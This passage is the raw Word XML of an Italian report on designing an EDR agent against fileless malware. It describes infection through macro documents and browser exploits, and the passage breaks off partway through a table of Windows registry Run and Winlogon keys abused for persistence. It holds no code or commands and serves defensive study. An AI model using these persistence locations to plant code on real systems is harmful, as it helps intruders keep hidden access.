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92FE" w14:textId="77777777" w:rsidR="00C31AC8" w:rsidRDefault="00C31AC8" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31AC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Progettazione di un agente EDR per la protezione da minacce fileless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A499701" w14:textId="4BA79EF9" w:rsidR="00A95A34" w:rsidRPr="00172077" w:rsidRDefault="00A95A34" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95A34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA1B42" w14:textId="1CBC82CC" w:rsidR="002A300D" w:rsidRPr="002A300D" w:rsidRDefault="002A300D" w:rsidP="002A300D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nel panorama odierno della cybersicurezza si assiste a un cambiamento radicale nelle strategie di infezione: il progressivo abbandono dei tradizionali file eseguibili (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) malevoli a favore di un approccio </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fileless</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Come </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>suggerisce</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> il termine, questa tipologia di minaccia non deposita </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>eseguibili</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sospetti sul disco rigido, ma opera sfruttando la memoria RAM e strumenti legittimi già </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31AC8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>presenti</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> nel sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad esempio)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685489D1" w14:textId="222F3DE1" w:rsidR="002A300D" w:rsidRPr="002A300D" w:rsidRDefault="002A300D" w:rsidP="002A300D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Questa evoluzione nasce dall'esigenza degli attaccanti di eludere le soluzioni di sicurezza convenzionali, quali gli antivirus basati su firma, che focalizzano la loro attività di scansione principalmente sul file system. Tuttavia,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> per un </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fileless malware</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> operare esclusivamente in RAM presenta un limite critico: la volatilità. Se risiedesse solo nella memoria volatile, la minaccia verrebbe eliminata a ogni semplice riavvio del computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3804C6" w14:textId="54BEBE15" w:rsidR="002A300D" w:rsidRDefault="002A300D" w:rsidP="002A300D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Per garantire la propria sopravvivenza, il malware fileless deve dunque stabilire un meccanismo di </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>persistenza</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. È in questa fase che il Registro di Sistema di Windows viene trasformato da database di configurazione a vero e proprio supporto </w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>di</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> storage per il </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106B2C8" w14:textId="77777777" w:rsidR="00DE028B" w:rsidRPr="00DE028B" w:rsidRDefault="00DE028B" w:rsidP="00DE028B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Il vettore di attacco: dall'esecuzione iniziale alla scrittura nel Registro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4905615F" w14:textId="61C97786" w:rsidR="00DE028B" w:rsidRPr="00DE028B" w:rsidRDefault="00DE028B" w:rsidP="00DE028B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Prima di potersi stabilire nel Registro di Sistema, il malware deve ottenere l'accesso iniziale al computer vittima. Questo avviene solitamente attraverso tecniche che non prevedono il salvataggio di un eseguibile tradizionale sul disco</w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, ad esempio</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E75549F" w14:textId="04657D3E" w:rsidR="00DE028B" w:rsidRPr="00DE028B" w:rsidRDefault="00DE028B" w:rsidP="00DE028B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing e </w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ocumenti </w:t>
      </w:r>
      <w:r w:rsidR="00EE4510">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">acro: L'utente riceve un file (es. Word o Excel) che, una volta aperto, esegue una macro. Questa macro non scarica un virus, ma lancia direttamente un comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> che scrive le chiavi malevole nel registro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C532C" w14:textId="77777777" w:rsidR="00DE028B" w:rsidRPr="00DE028B" w:rsidRDefault="00DE028B" w:rsidP="00DE028B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Exploit Kit e Vulnerabilità Browser: Navigando su un sito compromesso, una vulnerabilità del browser può permettere l'esecuzione di codice JavaScript che interagisce con il sistema, inserendo il payload direttamente nel registro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD85FAD" w14:textId="77777777" w:rsidR="00DE028B" w:rsidRPr="00DE028B" w:rsidRDefault="00DE028B" w:rsidP="00DE028B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Una volta che queste istruzioni sono state scritte nel Registro, il malware ha completato la fase di installazione fileless: da quel momento in poi, il "corpo" del virus risiederà solo nel database del Registro e la </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sua</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE028B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> attività sarà visibile solo in memoria RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3936AE" w14:textId="36F3697C" w:rsidR="00DE028B" w:rsidRDefault="00A11D1F" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE3336" w14:textId="48FF5DDB" w:rsidR="00A11D1F" w:rsidRPr="00EE4510" w:rsidRDefault="004C6185" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I fileless malware e i registri di sistema</w:t>
      </w:r>
      <w:r w:rsidR="00C8302E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, meccanismi di persistenza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33E40C" w14:textId="56FC5B05" w:rsidR="00125DF2" w:rsidRDefault="000132E6" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fileless m</w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>lware</w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004410EE" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>uò</w:t>
      </w:r>
      <w:r w:rsidR="004410EE" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sfruttare </w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">opportunamente una o più </w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chiavi d</w:t>
      </w:r>
      <w:r w:rsidR="00700FBC" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">el registro </w:t>
      </w:r>
      <w:r w:rsidR="004C6185" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">per </w:t>
      </w:r>
      <w:r w:rsidR="002A300D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>garantire la sua persistenza</w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> o la memorizzazione di </w:t>
      </w:r>
      <w:r w:rsidR="00A11D1F" w:rsidRPr="00172077">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>codice</w:t>
      </w:r>
      <w:r w:rsidR="00125DF2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1B193" w14:textId="55F52790" w:rsidR="006900E6" w:rsidRDefault="00125DF2" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Le HKEY</w:t>
      </w:r>
      <w:r w:rsidR="00C8302E">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Handle to a Key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> non hanno tutte lo stesso scopo</w:t>
      </w:r>
      <w:r w:rsidR="006900E6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006900E6" w:rsidRPr="00EE4510">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidR="006900E6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> esempio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabellachiara"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6992"/>
        <w:gridCol w:w="2636"/>
      </w:tblGrid>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="5C481518" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5E5763" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Chiave di Registro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4B494E" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Funzione / Abuso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="12146F80" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="545E18CD" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKCU\Software\Microsoft\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EA5D92" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Persistenza a livello utente con esecuzione automatica al logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="74F95FD7" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35064396" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\Software\Microsoft\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5BB346" w14:textId="39D27D98" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Persistenza globale per tutti gli utenti</w:t>
            </w:r>
            <w:r w:rsidR="007715AA">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> al logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="24D66F14" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DDEAC06" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Winlogon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Userinit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027A31D5" w14:textId="791A0672" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
